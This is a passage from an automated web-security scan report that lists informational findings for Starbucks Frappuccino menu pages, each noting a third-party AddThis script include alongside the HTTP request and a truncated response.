6.133. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:24 GMT
Connection: close
Content-Length: 44905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.134. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:33 GMT
Connection: close
Content-Length: 45757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.135. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:42 GMT
Connection: close
Content-Length: 44829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.136. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:59 GMT
Connection: close
Content-Length: 45009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.137. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:26 GMT
Connection: close
Content-Length: 45025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.138. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:18 GMT
Connection: close
Content-Length: 45252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.139. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:23 GMT
Connection: close
Content-Length: 44851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.140. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:56 GMT
Connection: close
Content-Length: 45064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.141. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:59 GMT
Connection: close
Content-Length: 45012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:24 GMT
Connection: close
Content-Length: 43544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:37 GMT
Connection: close
Content-Length: 42777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:40 GMT
Connection: close
Content-Length: 44826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:43 GMT
Connection: close
Content-Length: 45102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:49 GMT
Connection: close
Content-Length: 43123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:50 GMT
Connection: close
Content-Length: 44514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:20 GMT
Connection: close
Content-Length: 45265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:35 GMT
Connection: close
Content-Length: 45059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:29 GMT
Connection: close
Content-Length: 45088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
